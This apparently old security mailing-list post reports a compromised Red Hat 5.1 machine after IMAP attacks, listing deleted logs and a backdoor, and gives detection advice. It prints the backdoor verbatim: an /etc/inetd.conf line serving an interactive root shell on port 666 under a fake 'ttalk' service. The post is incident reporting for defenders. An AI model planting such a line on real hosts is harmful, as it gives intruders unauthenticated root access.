IMAP attacks continue

An addendum to:

I found a machine that had Red Hat 5.1 unmodified running on it, and it
got hit. So I closed things off and looked around for damage and found
the following:

1. Syslogd had been killed off and the syslog file deleted.

2. A backdoor was installed in /etc/inetd.conf as follows:

ttalk stream tcp nowait root /bin/sh sh -i

I checked the ports assignments from IANA and there is no such thing as
"ttalk". I found this line in /etc/services:

ttalk 666/tcp

so it appears to be hijacking the port used by (as seen in the file

mdqs 666/tcp
mdqs 666/udp
doom 666/tcp doom Id Software
doom 666/udp doom Id Software

So also check /etc/services on any potentially compromised machines.

Btw. The best you can do is to install access-filter on the router and
log any attempts to connect into this port in your network; and if you
see such attempt you should write 'Hacker in your system (suspection)'
warning to the network admin where this connect was originated from.

70% of this cases should be 'broken systems'.